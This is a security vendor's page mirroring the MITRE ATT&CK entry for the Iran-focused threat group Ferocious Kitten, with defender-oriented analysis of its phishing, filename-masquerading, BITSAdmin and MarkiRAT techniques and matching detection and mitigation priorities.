Live Active security incident? Get immediate response
MITRE ATT&CK® Group

G0137: Ferocious Kitten

Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.[1]

EnterpriseG0137GroupObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

Ferocious Kitten is an ATT&CK group entry describing activity primarily targeting Persian-speaking individuals in Iran since at least 2015. The practical concern for defenders is targeted social engineering: the related ATT&CK context points to spearphishing attachments, malicious files, filename/resource masquerading, acquired domains, and use of tools including BITSAdmin and MarkiRAT. For leaders, this is a reminder that targeted intrusion readiness depends on email controls, endpoint visibility, user-reporting paths, and incident response playbooks—not just perimeter blocking.

Executive priority

Prioritize this as a targeted-phishing and endpoint-compromise readiness issue where the organization has relevant exposure to the described victimology or similar high-risk users. Ask whether security teams can prove they collect and retain evidence for malicious attachments, suspicious filenames, BITSAdmin/BITS job activity, RAT-like endpoint behavior, and domain-based infrastructure. This object is also useful for audit and compliance discussions because it maps executive risk questions to concrete evidence: email filtering decisions, endpoint logs, user execution events, and response procedures.

Technical view

MITRE provides no official detection text for this group, so SOC validation should be built from the related software and techniques. Validate visibility for T1566.001 Spearphishing Attachment and T1204.002 Malicious File across mail gateways, endpoint controls, and user execution telemetry. Review controls and detections for T1036.002 Right-to-Left Override and T1036.005 Match Legitimate Resource Name or Location, especially file names, paths, and misleading extensions. Because the relationship set includes S0190 BITSAdmin on Windows, confirm monitoring for unusual BITSAdmin execution and BITS job creation. Because S0652 MarkiRAT is listed as used by Ferocious Kitten, ensure malware/RAT triage procedures can preserve host, process, file, and network evidence without assuming a single indicator set.

Likely telemetry

  • Email security logs for attachments, sender metadata, delivery disposition, and user interaction
  • Endpoint process creation and command-line telemetry, especially for BITSAdmin where Windows telemetry is available
  • File creation, rename, path, extension, and Unicode filename metadata for RTLO or masquerading patterns
  • Endpoint detection or antivirus alerts for suspicious files and RAT-like behavior
  • DNS, proxy, and network connection logs for domain-based infrastructure identified during investigations

Detection direction

  • Do not rely on a group-level signature; ATT&CK supplies no official detection guidance for this intrusion set.
  • Tune phishing detections for attachment-driven delivery and user execution while accounting for legitimate business documents to reduce false positives.
  • Add or validate analytics for right-to-left override characters, misleading extensions, and files placed or named to resemble legitimate resources.
  • Monitor BITSAdmin/BITS job activity for unusual parent processes, destinations, timing, or user context, recognizing that BITSAdmin can have legitimate administrative use.
  • Use domain, DNS, proxy, and endpoint context together; acquired domains alone are not sufficient for high-confidence detection.

Mitigation priorities

  • Harden email attachment handling with sandboxing, filtering, and user-reporting workflows appropriate to targeted phishing risk.
  • Reduce user-execution risk through endpoint protection, attachment detonation, least privilege, and clear procedures for suspicious files.
  • Apply endpoint controls and logging for script/tool abuse and administrative utilities such as BITSAdmin where relevant.
  • Improve filename and path inspection for Unicode deception and masquerading patterns rather than depending only on visible file names.
  • Maintain incident response playbooks for suspected RAT activity, including host isolation criteria, evidence preservation, and scoping across email and endpoint data.
Analyst notes and limits

The most decision-useful context comes from relationships rather than the group description itself. Ferocious Kitten is linked to phishing-related execution, masquerading, domain acquisition, tool acquisition, BITSAdmin, and MarkiRAT. That makes this object useful for assessing targeted-phishing readiness and endpoint investigation depth, especially for organizations with users or missions relevant to the stated targeting context.

The supplied ATT&CK object does not specify group-level platforms, tactics, labels, or official detection guidance. Related techniques include multiple platforms, and related software includes Windows-specific context, but local applicability must be confirmed from the environment. This take does not assert current activity, attribution beyond the ATT&CK group entry, customer exposure, or guaranteed detection coverage.

Official MITRE ATT&CK definition

Ferocious Kitten

Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.[1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

6 rows
Domain ID Name Relationship / procedure
Enterprise T1204.002 Malicious File Sub-technique

Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.CitationKaspersky Ferocious Kitten Jun 2021
Enterprise T1036.002 Right-to-Left Override Sub-technique

Ferocious Kitten has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones.CitationKaspersky Ferocious Kitten Jun 2021
Enterprise T1036.005 Match Legitimate Resource Name or Location Sub-technique

Ferocious Kitten has named malicious files update.exe and loaded them into the compromise host's “Public” folder.CitationKaspersky Ferocious Kitten Jun 2021
Enterprise T1566.001 Spearphishing Attachment Sub-technique

Ferocious Kitten has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.CitationKaspersky Ferocious Kitten Jun 2021
Enterprise T1588.002 Tool Sub-technique

Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon.CitationKaspersky Ferocious Kitten Jun 2021
Enterprise T1583.001 Domains Sub-technique

Ferocious Kitten has acquired domains imitating legitimate sites.CitationKaspersky Ferocious Kitten Jun 2021
Associated objects

Groups, software, and campaigns

Relationship explorer

All related ATT&CK context

uses · Malware S0652: MarkiRAT Enterprise uses · Technique T1204.002: Malicious File Enterprise uses · Technique T1036.002: Right-to-Left Override Enterprise uses · Technique T1036.005: Match Legitimate Resource Name or Location Enterprise uses · Technique T1566.001: Spearphishing Attachment Enterprise uses · Technique T1588.002: Tool Enterprise uses · Technique T1583.001: Domains Enterprise uses · Tool S0190: BITSAdmin Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
7c42238d3e33972f...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 7c42238d3e33…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Kaspersky Ferocious Kitten Jun 2021

    GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.

    Open source URL
  2. [2]
    mitre-attack G0137
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use